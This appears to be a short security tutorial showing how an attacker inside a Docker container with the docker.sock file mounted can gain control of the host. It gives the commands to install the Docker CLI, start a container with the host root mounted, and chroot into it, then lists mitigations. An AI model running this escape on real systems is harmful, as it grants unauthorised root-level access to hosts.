Overview

Some docker images like Portainer, Nginx available on docker hub require add as volume docker.sock. This file allows managing other containers from the container. Unfortunately, access to this file can also give the attacker opportunity to get control over the host.

Preconditions

  • The attacker got access to docker container
  • Container has mounted /var/run/docker.sock

Checking if conditions fulfilled

To simulate precondition we create alpine image with mounted docker.sock:

docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock alpine sh

Let be sure if docker sock has been mounted:

ls /var/run/docker.sock 

/var/run/docker.sock

Another thing user need to check if docker CLI is installed under container:

docker

Result:

sh: docker: not found

Docker command was not found so it is needed to install it:

apk update
apk add -U docker

/ # apk update
fetch http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
fetch http://dl-cdn.alpinelinux.org/alpine/v3.12/community/x86_64/APKINDEX.tar.gz
v3.12.1-34-g3bbb400149 [http://dl-cdn.alpinelinux.org/alpine/v3.12/main]
v3.12.1-37-gb1aa03461c [http://dl-cdn.alpinelinux.org/alpine/v3.12/community]
OK: 12750 distinct packages available
/ # apk add -U docker
(1/12) Installing ca-certificates (20191127-r4)
(2/12) Installing libseccomp (2.4.3-r0)
(3/12) Installing runc (1.0.0_rc10-r1)
(4/12) Installing containerd (1.3.4-r1)
(5/12) Installing libmnl (1.0.4-r0)
(6/12) Installing libnftnl-libs (1.1.6-r0)
(7/12) Installing iptables (1.8.4-r2)
(8/12) Installing tini-static (0.19.0-r0)
(9/12) Installing device-mapper-libs (2.02.186-r1)
(10/12) Installing docker-engine (19.03.12-r0)
(11/12) Installing docker-cli (19.03.12-r0)
(12/12) Installing docker (19.03.12-r0)
Executing docker-19.03.12-r0.pre-install
Executing busybox-1.31.1-r16.trigger
Executing ca-certificates-20191127-r4.trigger
OK: 307 MiB in 26 packages

Escaping docker container

Having mounted docker.sock we have full access to managing docker containers. So we can: delete, exec, create, change configurations etc.

Our next step would be creating a new container with the mounted root directory as volume:

docker -H unix://var/run/docker.sock run -it -v /:/host -t alpine sh

Let’s now use chroot command over host directory

chroot host

Attacker gain full access to file system on the host directory.

How to secure?

  • Do not mount /var/run/docker.sock
  • If you need to mount into some containers treat it as root privileged application, secure it, try not to expose over the network
  • Run docker in rootless mode (Some docker features may not work properly)

Sources

Related Posts: